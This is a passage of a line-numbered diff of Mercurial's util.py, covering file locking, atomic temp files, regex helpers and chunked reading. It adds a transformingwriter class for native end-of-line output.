1654 1654 "on Windows") % c
1655 1655 if ord(c) <= 31:
1656 1656 return _("filename contains '%s', which is invalid "
1657 1657 "on Windows") % escapestr(c)
1658 1658 base = n.split('.')[0]
1659 1659 if base and base.lower() in _winreservednames:
1660 1660 return _("filename contains '%s', which is reserved "
1661 1661 "on Windows") % base
1662 1662 t = n[-1:]
1663 1663 if t in '. ' and n not in '..':
1664 1664 return _("filename ends with '%s', which is not allowed "
1665 1665 "on Windows") % t
1666 1666
1667 1667 if pycompat.iswindows:
1668 1668 checkosfilename = checkwinfilename
1669 1669 timer = time.clock
1670 1670 else:
1671 1671 checkosfilename = platform.checkosfilename
1672 1672 timer = time.time
1673 1673
1674 1674 if safehasattr(time, "perf_counter"):
1675 1675 timer = time.perf_counter
1676 1676
1677 1677 def makelock(info, pathname):
1678 1678 """Create a lock file atomically if possible
1679 1679
1680 1680 This may leave a stale lock file if symlink isn't supported and signal
1681 1681 interrupt is enabled.
1682 1682 """
1683 1683 try:
1684 1684 return os.symlink(info, pathname)
1685 1685 except OSError as why:
1686 1686 if why.errno == errno.EEXIST:
1687 1687 raise
1688 1688 except AttributeError: # no symlink in os
1689 1689 pass
1690 1690
1691 1691 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1692 1692 ld = os.open(pathname, flags)
1693 1693 os.write(ld, info)
1694 1694 os.close(ld)
1695 1695
1696 1696 def readlock(pathname):
1697 1697 try:
1698 1698 return os.readlink(pathname)
1699 1699 except OSError as why:
1700 1700 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1701 1701 raise
1702 1702 except AttributeError: # no symlink in os
1703 1703 pass
1704 1704 fp = posixfile(pathname, 'rb')
1705 1705 r = fp.read()
1706 1706 fp.close()
1707 1707 return r
1708 1708
1709 1709 def fstat(fp):
1710 1710 '''stat file object that may not have fileno method.'''
1711 1711 try:
1712 1712 return os.fstat(fp.fileno())
1713 1713 except AttributeError:
1714 1714 return os.stat(fp.name)
1715 1715
1716 1716 # File system features
1717 1717
1718 1718 def fscasesensitive(path):
1719 1719 """
1720 1720 Return true if the given path is on a case-sensitive filesystem
1721 1721
1722 1722 Requires a path (like /foo/.hg) ending with a foldable final
1723 1723 directory component.
1724 1724 """
1725 1725 s1 = os.lstat(path)
1726 1726 d, b = os.path.split(path)
1727 1727 b2 = b.upper()
1728 1728 if b == b2:
1729 1729 b2 = b.lower()
1730 1730 if b == b2:
1731 1731 return True # no evidence against case sensitivity
1732 1732 p2 = os.path.join(d, b2)
1733 1733 try:
1734 1734 s2 = os.lstat(p2)
1735 1735 if s2 == s1:
1736 1736 return False
1737 1737 return True
1738 1738 except OSError:
1739 1739 return True
1740 1740
1741 1741 try:
1742 1742 import re2
1743 1743 _re2 = None
1744 1744 except ImportError:
1745 1745 _re2 = False
1746 1746
1747 1747 class _re(object):
1748 1748 def _checkre2(self):
1749 1749 global _re2
1750 1750 try:
1751 1751 # check if match works, see issue3964
1752 1752 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1753 1753 except ImportError:
1754 1754 _re2 = False
1755 1755
1756 1756 def compile(self, pat, flags=0):
1757 1757 '''Compile a regular expression, using re2 if possible
1758 1758
1759 1759 For best performance, use only re2-compatible regexp features. The
1760 1760 only flags from the re module that are re2-compatible are
1761 1761 IGNORECASE and MULTILINE.'''
1762 1762 if _re2 is None:
1763 1763 self._checkre2()
1764 1764 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1765 1765 if flags & remod.IGNORECASE:
1766 1766 pat = '(?i)' + pat
1767 1767 if flags & remod.MULTILINE:
1768 1768 pat = '(?m)' + pat
1769 1769 try:
1770 1770 return re2.compile(pat)
1771 1771 except re2.error:
1772 1772 pass
1773 1773 return remod.compile(pat, flags)
1774 1774
1775 1775 @propertycache
1776 1776 def escape(self):
1777 1777 '''Return the version of escape corresponding to self.compile.
1778 1778
1779 1779 This is imperfect because whether re2 or re is used for a particular
1780 1780 function depends on the flags, etc, but it's the best we can do.
1781 1781 '''
1782 1782 global _re2
1783 1783 if _re2 is None:
1784 1784 self._checkre2()
1785 1785 if _re2:
1786 1786 return re2.escape
1787 1787 else:
1788 1788 return remod.escape
1789 1789
1790 1790 re = _re()
1791 1791
1792 1792 _fspathcache = {}
1793 1793 def fspath(name, root):
1794 1794 '''Get name in the case stored in the filesystem
1795 1795
1796 1796 The name should be relative to root, and be normcase-ed for efficiency.
1797 1797
1798 1798 Note that this function is unnecessary, and should not be
1799 1799 called, for case-sensitive filesystems (simply because it's expensive).
1800 1800
1801 1801 The root should be normcase-ed, too.
1802 1802 '''
1803 1803 def _makefspathcacheentry(dir):
1804 1804 return dict((normcase(n), n) for n in os.listdir(dir))
1805 1805
1806 1806 seps = pycompat.ossep
1807 1807 if pycompat.osaltsep:
1808 1808 seps = seps + pycompat.osaltsep
1809 1809 # Protect backslashes. This gets silly very quickly.
1810 1810 seps.replace('\\','\\\\')
1811 1811 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1812 1812 dir = os.path.normpath(root)
1813 1813 result = []
1814 1814 for part, sep in pattern.findall(name):
1815 1815 if sep:
1816 1816 result.append(sep)
1817 1817 continue
1818 1818
1819 1819 if dir not in _fspathcache:
1820 1820 _fspathcache[dir] = _makefspathcacheentry(dir)
1821 1821 contents = _fspathcache[dir]
1822 1822
1823 1823 found = contents.get(part)
1824 1824 if not found:
1825 1825 # retry "once per directory" per "dirstate.walk" which
1826 1826 # may take place for each patches of "hg qpush", for example
1827 1827 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1828 1828 found = contents.get(part)
1829 1829
1830 1830 result.append(found or part)
1831 1831 dir = os.path.join(dir, part)
1832 1832
1833 1833 return ''.join(result)
1834 1834
1835 1835 def checknlink(testfile):
1836 1836 '''check whether hardlink count reporting works properly'''
1837 1837
1838 1838 # testfile may be open, so we need a separate file for checking to
1839 1839 # work around issue2543 (or testfile may get lost on Samba shares)
1840 1840 f1, f2, fp = None, None, None
1841 1841 try:
1842 1842 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1843 1843 suffix='1~', dir=os.path.dirname(testfile))
1844 1844 os.close(fd)
1845 1845 f2 = '%s2~' % f1[:-2]
1846 1846
1847 1847 oslink(f1, f2)
1848 1848 # nlinks() may behave differently for files on Windows shares if
1849 1849 # the file is open.
1850 1850 fp = posixfile(f2)
1851 1851 return nlinks(f2) > 1
1852 1852 except OSError:
1853 1853 return False
1854 1854 finally:
1855 1855 if fp is not None:
1856 1856 fp.close()
1857 1857 for f in (f1, f2):
1858 1858 try:
1859 1859 if f is not None:
1860 1860 os.unlink(f)
1861 1861 except OSError:
1862 1862 pass
1863 1863
1864 1864 def endswithsep(path):
1865 1865 '''Check path ends with os.sep or os.altsep.'''
1866 1866 return (path.endswith(pycompat.ossep)
1867 1867 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1868 1868
1869 1869 def splitpath(path):
1870 1870 '''Split path by os.sep.
1871 1871 Note that this function does not use os.altsep because this is
1872 1872 an alternative of simple "xxx.split(os.sep)".
1873 1873 It is recommended to use os.path.normpath() before using this
1874 1874 function if need.'''
1875 1875 return path.split(pycompat.ossep)
1876 1876
1877 1877 def gui():
1878 1878 '''Are we running in a GUI?'''
1879 1879 if pycompat.isdarwin:
1880 1880 if 'SSH_CONNECTION' in encoding.environ:
1881 1881 # handle SSH access to a box where the user is logged in
1882 1882 return False
1883 1883 elif getattr(osutil, 'isgui', None):
1884 1884 # check if a CoreGraphics session is available
1885 1885 return osutil.isgui()
1886 1886 else:
1887 1887 # pure build; use a safe default
1888 1888 return True
1889 1889 else:
1890 1890 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1891 1891
1892 1892 def mktempcopy(name, emptyok=False, createmode=None):
1893 1893 """Create a temporary file with the same contents from name
1894 1894
1895 1895 The permission bits are copied from the original file.
1896 1896
1897 1897 If the temporary file is going to be truncated immediately, you
1898 1898 can use emptyok=True as an optimization.
1899 1899
1900 1900 Returns the name of the temporary file.
1901 1901 """
1902 1902 d, fn = os.path.split(name)
1903 1903 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1904 1904 os.close(fd)
1905 1905 # Temporary files are created with mode 0600, which is usually not
1906 1906 # what we want. If the original file already exists, just copy
1907 1907 # its mode. Otherwise, manually obey umask.
1908 1908 copymode(name, temp, createmode)
1909 1909 if emptyok:
1910 1910 return temp
1911 1911 try:
1912 1912 try:
1913 1913 ifp = posixfile(name, "rb")
1914 1914 except IOError as inst:
1915 1915 if inst.errno == errno.ENOENT:
1916 1916 return temp
1917 1917 if not getattr(inst, 'filename', None):
1918 1918 inst.filename = name
1919 1919 raise
1920 1920 ofp = posixfile(temp, "wb")
1921 1921 for chunk in filechunkiter(ifp):
1922 1922 ofp.write(chunk)
1923 1923 ifp.close()
1924 1924 ofp.close()
1925 1925 except: # re-raises
1926 1926 try:
1927 1927 os.unlink(temp)
1928 1928 except OSError:
1929 1929 pass
1930 1930 raise
1931 1931 return temp
1932 1932
1933 1933 class filestat(object):
1934 1934 """help to exactly detect change of a file
1935 1935
1936 1936 'stat' attribute is result of 'os.stat()' if specified 'path'
1937 1937 exists. Otherwise, it is None. This can avoid preparative
1938 1938 'exists()' examination on client side of this class.
1939 1939 """
1940 1940 def __init__(self, stat):
1941 1941 self.stat = stat
1942 1942
1943 1943 @classmethod
1944 1944 def frompath(cls, path):
1945 1945 try:
1946 1946 stat = os.stat(path)
1947 1947 except OSError as err:
1948 1948 if err.errno != errno.ENOENT:
1949 1949 raise
1950 1950 stat = None
1951 1951 return cls(stat)
1952 1952
1953 1953 @classmethod
1954 1954 def fromfp(cls, fp):
1955 1955 stat = os.fstat(fp.fileno())
1956 1956 return cls(stat)
1957 1957
1958 1958 __hash__ = object.__hash__
1959 1959
1960 1960 def __eq__(self, old):
1961 1961 try:
1962 1962 # if ambiguity between stat of new and old file is
1963 1963 # avoided, comparison of size, ctime and mtime is enough
1964 1964 # to exactly detect change of a file regardless of platform
1965 1965 return (self.stat.st_size == old.stat.st_size and
1966 1966 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1967 1967 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1968 1968 except AttributeError:
1969 1969 pass
1970 1970 try:
1971 1971 return self.stat is None and old.stat is None
1972 1972 except AttributeError:
1973 1973 return False
1974 1974
1975 1975 def isambig(self, old):
1976 1976 """Examine whether new (= self) stat is ambiguous against old one
1977 1977
1978 1978 "S[N]" below means stat of a file at N-th change:
1979 1979
1980 1980 - S[n-1].ctime < S[n].ctime: can detect change of a file
1981 1981 - S[n-1].ctime == S[n].ctime
1982 1982 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1983 1983 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1984 1984 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1985 1985 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1986 1986
1987 1987 Case (*2) above means that a file was changed twice or more at
1988 1988 same time in sec (= S[n-1].ctime), and comparison of timestamp
1989 1989 is ambiguous.
1990 1990
1991 1991 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1992 1992 timestamp is ambiguous".
1993 1993
1994 1994 But advancing mtime only in case (*2) doesn't work as
1995 1995 expected, because naturally advanced S[n].mtime in case (*1)
1996 1996 might be equal to manually advanced S[n-1 or earlier].mtime.
1997 1997
1998 1998 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1999 1999 treated as ambiguous regardless of mtime, to avoid overlooking
2000 2000 by confliction between such mtime.
2001 2001
2002 2002 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2003 2003 S[n].mtime", even if size of a file isn't changed.
2004 2004 """
2005 2005 try:
2006 2006 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2007 2007 except AttributeError:
2008 2008 return False
2009 2009
2010 2010 def avoidambig(self, path, old):
2011 2011 """Change file stat of specified path to avoid ambiguity
2012 2012
2013 2013 'old' should be previous filestat of 'path'.
2014 2014
2015 2015 This skips avoiding ambiguity, if a process doesn't have
2016 2016 appropriate privileges for 'path'. This returns False in this
2017 2017 case.
2018 2018
2019 2019 Otherwise, this returns True, as "ambiguity is avoided".
2020 2020 """
2021 2021 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2022 2022 try:
2023 2023 os.utime(path, (advanced, advanced))
2024 2024 except OSError as inst:
2025 2025 if inst.errno == errno.EPERM:
2026 2026 # utime() on the file created by another user causes EPERM,
2027 2027 # if a process doesn't have appropriate privileges
2028 2028 return False
2029 2029 raise
2030 2030 return True
2031 2031
2032 2032 def __ne__(self, other):
2033 2033 return not self == other
2034 2034
2035 2035 class atomictempfile(object):
2036 2036 '''writable file object that atomically updates a file
2037 2037
2038 2038 All writes will go to a temporary copy of the original file. Call
2039 2039 close() when you are done writing, and atomictempfile will rename
2040 2040 the temporary copy to the original name, making the changes
2041 2041 visible. If the object is destroyed without being closed, all your
2042 2042 writes are discarded.
2043 2043
2044 2044 checkambig argument of constructor is used with filestat, and is
2045 2045 useful only if target file is guarded by any lock (e.g. repo.lock
2046 2046 or repo.wlock).
2047 2047 '''
2048 2048 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2049 2049 self.__name = name # permanent name
2050 2050 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2051 2051 createmode=createmode)
2052 2052 self._fp = posixfile(self._tempname, mode)
2053 2053 self._checkambig = checkambig
2054 2054
2055 2055 # delegated methods
2056 2056 self.read = self._fp.read
2057 2057 self.write = self._fp.write
2058 2058 self.seek = self._fp.seek
2059 2059 self.tell = self._fp.tell
2060 2060 self.fileno = self._fp.fileno
2061 2061
2062 2062 def close(self):
2063 2063 if not self._fp.closed:
2064 2064 self._fp.close()
2065 2065 filename = localpath(self.__name)
2066 2066 oldstat = self._checkambig and filestat.frompath(filename)
2067 2067 if oldstat and oldstat.stat:
2068 2068 rename(self._tempname, filename)
2069 2069 newstat = filestat.frompath(filename)
2070 2070 if newstat.isambig(oldstat):
2071 2071 # stat of changed file is ambiguous to original one
2072 2072 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2073 2073 os.utime(filename, (advanced, advanced))
2074 2074 else:
2075 2075 rename(self._tempname, filename)
2076 2076
2077 2077 def discard(self):
2078 2078 if not self._fp.closed:
2079 2079 try:
2080 2080 os.unlink(self._tempname)
2081 2081 except OSError:
2082 2082 pass
2083 2083 self._fp.close()
2084 2084
2085 2085 def __del__(self):
2086 2086 if safehasattr(self, '_fp'): # constructor actually did something
2087 2087 self.discard()
2088 2088
2089 2089 def __enter__(self):
2090 2090 return self
2091 2091
2092 2092 def __exit__(self, exctype, excvalue, traceback):
2093 2093 if exctype is not None:
2094 2094 self.discard()
2095 2095 else:
2096 2096 self.close()
2097 2097
2098 2098 def unlinkpath(f, ignoremissing=False):
2099 2099 """unlink and remove the directory if it is empty"""
2100 2100 if ignoremissing:
2101 2101 tryunlink(f)
2102 2102 else:
2103 2103 unlink(f)
2104 2104 # try removing directories that might now be empty
2105 2105 try:
2106 2106 removedirs(os.path.dirname(f))
2107 2107 except OSError:
2108 2108 pass
2109 2109
2110 2110 def tryunlink(f):
2111 2111 """Attempt to remove a file, ignoring ENOENT errors."""
2112 2112 try:
2113 2113 unlink(f)
2114 2114 except OSError as e:
2115 2115 if e.errno != errno.ENOENT:
2116 2116 raise
2117 2117
2118 2118 def makedirs(name, mode=None, notindexed=False):
2119 2119 """recursive directory creation with parent mode inheritance
2120 2120
2121 2121 Newly created directories are marked as "not to be indexed by
2122 2122 the content indexing service", if ``notindexed`` is specified
2123 2123 for "write" mode access.
2124 2124 """
2125 2125 try:
2126 2126 makedir(name, notindexed)
2127 2127 except OSError as err:
2128 2128 if err.errno == errno.EEXIST:
2129 2129 return
2130 2130 if err.errno != errno.ENOENT or not name:
2131 2131 raise
2132 2132 parent = os.path.dirname(os.path.abspath(name))
2133 2133 if parent == name:
2134 2134 raise
2135 2135 makedirs(parent, mode, notindexed)
2136 2136 try:
2137 2137 makedir(name, notindexed)
2138 2138 except OSError as err:
2139 2139 # Catch EEXIST to handle races
2140 2140 if err.errno == errno.EEXIST:
2141 2141 return
2142 2142 raise
2143 2143 if mode is not None:
2144 2144 os.chmod(name, mode)
2145 2145
2146 2146 def readfile(path):
2147 2147 with open(path, 'rb') as fp:
2148 2148 return fp.read()
2149 2149
2150 2150 def writefile(path, text):
2151 2151 with open(path, 'wb') as fp:
2152 2152 fp.write(text)
2153 2153
2154 2154 def appendfile(path, text):
2155 2155 with open(path, 'ab') as fp:
2156 2156 fp.write(text)
2157 2157
2158 2158 class chunkbuffer(object):
2159 2159 """Allow arbitrary sized chunks of data to be efficiently read from an
2160 2160 iterator over chunks of arbitrary size."""
2161 2161
2162 2162 def __init__(self, in_iter):
2163 2163 """in_iter is the iterator that's iterating over the input chunks."""
2164 2164 def splitbig(chunks):
2165 2165 for chunk in chunks:
2166 2166 if len(chunk) > 2**20:
2167 2167 pos = 0
2168 2168 while pos < len(chunk):
2169 2169 end = pos + 2 ** 18
2170 2170 yield chunk[pos:end]
2171 2171 pos = end
2172 2172 else:
2173 2173 yield chunk
2174 2174 self.iter = splitbig(in_iter)
2175 2175 self._queue = collections.deque()
2176 2176 self._chunkoffset = 0
2177 2177
2178 2178 def read(self, l=None):
2179 2179 """Read L bytes of data from the iterator of chunks of data.
2180 2180 Returns less than L bytes if the iterator runs dry.
2181 2181
2182 2182 If size parameter is omitted, read everything"""
2183 2183 if l is None:
2184 2184 return ''.join(self.iter)
2185 2185
2186 2186 left = l
2187 2187 buf = []
2188 2188 queue = self._queue
2189 2189 while left > 0:
2190 2190 # refill the queue
2191 2191 if not queue:
2192 2192 target = 2**18
2193 2193 for chunk in self.iter:
2194 2194 queue.append(chunk)
2195 2195 target -= len(chunk)
2196 2196 if target <= 0:
2197 2197 break
2198 2198 if not queue:
2199 2199 break
2200 2200
2201 2201 # The easy way to do this would be to queue.popleft(), modify the
2202 2202 # chunk (if necessary), then queue.appendleft(). However, for cases
2203 2203 # where we read partial chunk content, this incurs 2 dequeue
2204 2204 # mutations and creates a new str for the remaining chunk in the
2205 2205 # queue. Our code below avoids this overhead.
2206 2206
2207 2207 chunk = queue[0]
2208 2208 chunkl = len(chunk)
2209 2209 offset = self._chunkoffset
2210 2210
2211 2211 # Use full chunk.
2212 2212 if offset == 0 and left >= chunkl:
2213 2213 left -= chunkl
2214 2214 queue.popleft()
2215 2215 buf.append(chunk)
2216 2216 # self._chunkoffset remains at 0.
2217 2217 continue
2218 2218
2219 2219 chunkremaining = chunkl - offset
2220 2220
2221 2221 # Use all of unconsumed part of chunk.
2222 2222 if left >= chunkremaining:
2223 2223 left -= chunkremaining
2224 2224 queue.popleft()
2225 2225 # offset == 0 is enabled by block above, so this won't merely
2226 2226 # copy via ``chunk[0:]``.
2227 2227 buf.append(chunk[offset:])
2228 2228 self._chunkoffset = 0
2229 2229
2230 2230 # Partial chunk needed.
2231 2231 else:
2232 2232 buf.append(chunk[offset:offset + left])
2233 2233 self._chunkoffset += left
2234 2234 left -= chunkremaining
2235 2235
2236 2236 return ''.join(buf)
2237 2237
2238 2238 def filechunkiter(f, size=131072, limit=None):
2239 2239 """Create a generator that produces the data in the file size
2240 2240 (default 131072) bytes at a time, up to optional limit (default is
2241 2241 to read all data). Chunks may be less than size bytes if the
2242 2242 chunk is the last chunk in the file, or the file is a socket or
2243 2243 some other type of file that sometimes reads less data than is
2244 2244 requested."""
2245 2245 assert size >= 0
2246 2246 assert limit is None or limit >= 0
2247 2247 while True:
2248 2248 if limit is None:
2249 2249 nbytes = size
2250 2250 else:
2251 2251 nbytes = min(limit, size)
2252 2252 s = nbytes and f.read(nbytes)
2253 2253 if not s:
2254 2254 break
2255 2255 if limit:
2256 2256 limit -= len(s)
2257 2257 yield s
2258 2258
2259 2259 class cappedreader(object):
2260 2260 """A file object proxy that allows reading up to N bytes.
2261 2261
2262 2262 Given a source file object, instances of this type allow reading up to
2263 2263 N bytes from that source file object. Attempts to read past the allowed
2264 2264 limit are treated as EOF.
2265 2265
2266 2266 It is assumed that I/O is not performed on the original file object
2267 2267 in addition to I/O that is performed by this instance. If there is,
2268 2268 state tracking will get out of sync and unexpected results will ensue.
2269 2269 """
2270 2270 def __init__(self, fh, limit):
2271 2271 """Allow reading up to <limit> bytes from <fh>."""
2272 2272 self._fh = fh
2273 2273 self._left = limit
2274 2274
2275 2275 def read(self, n=-1):
2276 2276 if not self._left:
2277 2277 return b''
2278 2278
2279 2279 if n < 0:
2280 2280 n = self._left
2281 2281
2282 2282 data = self._fh.read(min(n, self._left))
2283 2283 self._left -= len(data)
2284 2284 assert self._left >= 0
2285 2285
2286 2286 return data
2287 2287
2288 2288 def stringmatcher(pattern, casesensitive=True):
2289 2289 """
2290 2290 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2291 2291 returns the matcher name, pattern, and matcher function.
2292 2292 missing or unknown prefixes are treated as literal matches.
2293 2293
2294 2294 helper for tests:
2295 2295 >>> def test(pattern, *tests):
2296 2296 ... kind, pattern, matcher = stringmatcher(pattern)
2297 2297 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2298 2298 >>> def itest(pattern, *tests):
2299 2299 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2300 2300 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2301 2301
2302 2302 exact matching (no prefix):
2303 2303 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2304 2304 ('literal', 'abcdefg', [False, False, True])
2305 2305
2306 2306 regex matching ('re:' prefix)
2307 2307 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2308 2308 ('re', 'a.+b', [False, False, True])
2309 2309
2310 2310 force exact matches ('literal:' prefix)
2311 2311 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2312 2312 ('literal', 're:foobar', [False, True])
2313 2313
2314 2314 unknown prefixes are ignored and treated as literals
2315 2315 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2316 2316 ('literal', 'foo:bar', [False, False, True])
2317 2317
2318 2318 case insensitive regex matches
2319 2319 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2320 2320 ('re', 'A.+b', [False, False, True])
2321 2321
2322 2322 case insensitive literal matches
2323 2323 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2324 2324 ('literal', 'ABCDEFG', [False, False, True])
2325 2325 """
2326 2326 if pattern.startswith('re:'):
2327 2327 pattern = pattern[3:]
2328 2328 try:
2329 2329 flags = 0
2330 2330 if not casesensitive:
2331 2331 flags = remod.I
2332 2332 regex = remod.compile(pattern, flags)
2333 2333 except remod.error as e:
2334 2334 raise error.ParseError(_('invalid regular expression: %s')
2335 2335 % e)
2336 2336 return 're', pattern, regex.search
2337 2337 elif pattern.startswith('literal:'):
2338 2338 pattern = pattern[8:]
2339 2339
2340 2340 match = pattern.__eq__
2341 2341
2342 2342 if not casesensitive:
2343 2343 ipat = encoding.lower(pattern)
2344 2344 match = lambda s: ipat == encoding.lower(s)
2345 2345 return 'literal', pattern, match
2346 2346
2347 2347 def shortuser(user):
2348 2348 """Return a short representation of a user name or email address."""
2349 2349 f = user.find('@')
2350 2350 if f >= 0:
2351 2351 user = user[:f]
2352 2352 f = user.find('<')
2353 2353 if f >= 0:
2354 2354 user = user[f + 1:]
2355 2355 f = user.find(' ')
2356 2356 if f >= 0:
2357 2357 user = user[:f]
2358 2358 f = user.find('.')
2359 2359 if f >= 0:
2360 2360 user = user[:f]
2361 2361 return user
2362 2362
2363 2363 def emailuser(user):
2364 2364 """Return the user portion of an email address."""
2365 2365 f = user.find('@')
2366 2366 if f >= 0:
2367 2367 user = user[:f]
2368 2368 f = user.find('<')
2369 2369 if f >= 0:
2370 2370 user = user[f + 1:]
2371 2371 return user
2372 2372
2373 2373 def email(author):
2374 2374 '''get email of author.'''
2375 2375 r = author.find('>')
2376 2376 if r == -1:
2377 2377 r = None
2378 2378 return author[author.find('<') + 1:r]
2379 2379
2380 2380 def ellipsis(text, maxlength=400):
2381 2381 """Trim string to at most maxlength (default: 400) columns in display."""
2382 2382 return encoding.trim(text, maxlength, ellipsis='...')
2383 2383
2384 2384 def unitcountfn(*unittable):
2385 2385 '''return a function that renders a readable count of some quantity'''
2386 2386
2387 2387 def go(count):
2388 2388 for multiplier, divisor, format in unittable:
2389 2389 if abs(count) >= divisor * multiplier:
2390 2390 return format % (count / float(divisor))
2391 2391 return unittable[-1][2] % count
2392 2392
2393 2393 return go
2394 2394
2395 2395 def processlinerange(fromline, toline):
2396 2396 """Check that linerange <fromline>:<toline> makes sense and return a
2397 2397 0-based range.
2398 2398
2399 2399 >>> processlinerange(10, 20)
2400 2400 (9, 20)
2401 2401 >>> processlinerange(2, 1)
2402 2402 Traceback (most recent call last):
2403 2403 ...
2404 2404 ParseError: line range must be positive
2405 2405 >>> processlinerange(0, 5)
2406 2406 Traceback (most recent call last):
2407 2407 ...
2408 2408 ParseError: fromline must be strictly positive
2409 2409 """
2410 2410 if toline - fromline < 0:
2411 2411 raise error.ParseError(_("line range must be positive"))
2412 2412 if fromline < 1:
2413 2413 raise error.ParseError(_("fromline must be strictly positive"))
2414 2414 return fromline - 1, toline
2415 2415
2416 2416 bytecount = unitcountfn(
2417 2417 (100, 1 << 30, _('%.0f GB')),
2418 2418 (10, 1 << 30, _('%.1f GB')),
2419 2419 (1, 1 << 30, _('%.2f GB')),
2420 2420 (100, 1 << 20, _('%.0f MB')),
2421 2421 (10, 1 << 20, _('%.1f MB')),
2422 2422 (1, 1 << 20, _('%.2f MB')),
2423 2423 (100, 1 << 10, _('%.0f KB')),
2424 2424 (10, 1 << 10, _('%.1f KB')),
2425 2425 (1, 1 << 10, _('%.2f KB')),
2426 2426 (1, 1, _('%.0f bytes')),
2427 2427 )
2428 2428
2429 class transformingwriter(object):
2430 """Writable file wrapper to transform data by function"""
2431
2432 def __init__(self, fp, encode):
2433 self._fp = fp
2434 self._encode = encode
2435
2436 def close(self):
2437 self._fp.close()
2438
2439 def flush(self):
2440 self._fp.flush()
2441
2442 def write(self, data):
2443 return self._fp.write(self._encode(data))
2444
2429 2445 # Matches a single EOL which can either be a CRLF where repeated CR
2430 2446 # are removed or a LF. We do not care about old Macintosh files, so a
2431 2447 # stray CR is an error.
2432 2448 _eolre = remod.compile(br'\r*\n')
2433 2449
2434 2450 def tolf(s):
2435 2451 return _eolre.sub('\n', s)
2436 2452
2437 2453 def tocrlf(s):
2438 2454 return _eolre.sub('\r\n', s)
2439 2455
2456 def _crlfwriter(fp):
2457 return transformingwriter(fp, tocrlf)
2458
2440 2459 if pycompat.oslinesep == '\r\n':
2441 2460 tonativeeol = tocrlf
2442 2461 fromnativeeol = tolf
2462 nativeeolwriter = _crlfwriter
2443 2463 else:
2444 2464 tonativeeol = pycompat.identity
2445 2465 fromnativeeol = pycompat.identity
2466 nativeeolwriter = pycompat.identity
2446 2467
2447 2468 def escapestr(s):
2448 2469 # call underlying function of s.encode('string_escape') directly for
2449 2470 # Python 3 compatibility
2450 2471 return codecs.escape_encode(s)[0]
2451 2472
2452 2473 def unescapestr(s):
2453 2474 return codecs.escape_decode(s)[0]
2454 2475
2455 2476 def forcebytestr(obj):
2456 2477 """Portably format an arbitrary object (e.g. exception) into a byte
2457 2478 string."""
2458 2479 try:
2459 2480 return pycompat.bytestr(obj)
2460 2481 except UnicodeEncodeError:
2461 2482 # non-ascii string, may be lossy
2462 2483 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2463 2484
2464 2485 def uirepr(s):
2465 2486 # Avoid double backslash in Windows path repr()
2466 2487 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2467 2488
2468 2489 # delay import of textwrap
2469 2490 def MBTextWrapper(**kwargs):
2470 2491 class tw(textwrap.TextWrapper):
2471 2492 """
2472 2493 Extend TextWrapper for width-awareness.
2473 2494
2474 2495 Neither number of 'bytes' in any encoding nor 'characters' is
2475 2496 appropriate to calculate terminal columns for specified string.
2476 2497
2477 2498 Original TextWrapper implementation uses built-in 'len()' directly,
2478 2499 so overriding is needed to use width information of each characters.
2479 2500
2480 2501 In addition, characters classified into 'ambiguous' width are
2481 2502 treated as wide in East Asian area, but as narrow in other.
2482 2503
2483 2504 This requires use decision to determine width of such characters.
2484 2505 """
2485 2506 def _cutdown(self, ucstr, space_left):
2486 2507 l = 0
2487 2508 colwidth = encoding.ucolwidth
2488 2509 for i in xrange(len(ucstr)):
2489 2510 l += colwidth(ucstr[i])
2490 2511 if space_left < l:
2491 2512 return (ucstr[:i], ucstr[i:])
2492 2513 return ucstr, ''
2493 2514
2494 2515 # overriding of base class
2495 2516 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2496 2517 space_left = max(width - cur_len, 1)
2497 2518
2498 2519 if self.break_long_words:
2499 2520 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2500 2521 cur_line.append(cut)
2501 2522 reversed_chunks[-1] = res
2502 2523 elif not cur_line:
2503 2524 cur_line.append(reversed_chunks.pop())
2504 2525
2505 2526 # this overriding code is imported from TextWrapper of Python 2.6
2506 2527 # to calculate columns of string by 'encoding.ucolwidth()'
2507 2528 def _wrap_chunks(self, chunks):
2508 2529 colwidth = encoding.ucolwidth
2509 2530
2510 2531 lines = []
2511 2532 if self.width <= 0:
2512 2533 raise ValueError("invalid width %r (must be > 0)" % self.width)
2513 2534
2514 2535 # Arrange in reverse order so items can be efficiently popped
2515 2536 # from a stack of chucks.
